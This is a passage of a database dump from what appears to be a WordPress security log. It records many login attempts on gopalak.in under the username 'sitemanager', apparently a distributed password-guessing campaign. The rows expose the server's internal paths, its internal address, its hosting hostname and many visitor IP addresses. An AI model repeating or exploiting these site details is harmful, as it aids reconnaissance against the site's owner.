Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44742\";s:11:\"REMOTE_ADDR\";s:14:\"103.221.222.85\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745960713.8595331;s:12:\"REQUEST_TIME\";i:1745960713;}}','103.221.222.85',0,'2025-04-30 02:35:15','1970-01-01 00:00:00'),(94391,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49802\";s:11:\"REMOTE_ADDR\";s:12:\"81.88.53.143\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745961013.5740631;s:12:\"REQUEST_TIME\";i:1745961013;}}','81.88.53.143',0,'2025-04-30 02:40:15','1970-01-01 00:00:00'),(94392,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.126 Safari/537.36 Edg/113.0.1774.50\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50344\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.128.22\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745961312.758234;s:12:\"REQUEST_TIME\";i:1745961312;}}','66.102.128.22',0,'2025-04-30 02:45:14','1970-01-01 00:00:00'),(94393,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59398\";s:11:\"REMOTE_ADDR\";s:14:\"103.191.76.181\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745961612.7374279;s:12:\"REQUEST_TIME\";i:1745961612;}}','103.191.76.181',0,'2025-04-30 02:50:14','1970-01-01 00:00:00'),(94394,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51500\";s:11:\"REMOTE_ADDR\";s:13:\"54.37.137.204\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745961906.0584159;s:12:\"REQUEST_TIME\";i:1745961906;}}','54.37.137.204',0,'2025-04-30 02:55:07','1970-01-01 00:00:00'),(94395,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57076\";s:11:\"REMOTE_ADDR\";s:13:\"49.238.228.30\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745962201.9071331;s:12:\"REQUEST_TIME\";i:1745962201;}}','49.238.228.30',0,'2025-04-30 03:00:03','1970-01-01 00:00:00'),(94396,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37780\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.61.165\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745962501.1803689;s:12:\"REQUEST_TIME\";i:1745962501;}}','94.23.61.165',0,'2025-04-30 03:05:03','1970-01-01 00:00:00'),(94397,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54102\";s:11:\"REMOTE_ADDR\";s:13:\"66.108.76.186\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745962804.58248;s:12:\"REQUEST_TIME\";i:1745962804;}}','66.108.76.186',0,'2025-04-30 03:10:06','1970-01-01 00:00:00'),(94398,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54582\";s:11:\"REMOTE_ADDR\";s:14:\"134.209.104.76\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745963103.6961131;s:12:\"REQUEST_TIME\";i:1745963103;}}','134.209.104.76',0,'2025-04-30 03:15:05','1970-01-01 00:00:00'),(94399,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:112:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56608\";s:11:\"REMOTE_ADDR\";s:14:\"185.104.44.170\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745963408.3431351;s:12:\"REQUEST_TIME\";i:1745963408;}}','185.104.44.170',0,'2025-04-30 03:20:10','1970-01-01 00:00:00'),(94400,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58010\";s:11:\"REMOTE_ADDR\";s:14:\"185.88.177.131\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745963714.4936309;s:12:\"REQUEST_TIME\";i:1745963714;}}','185.88.177.131',0,'2025-04-30 03:25:16','1970-01-01 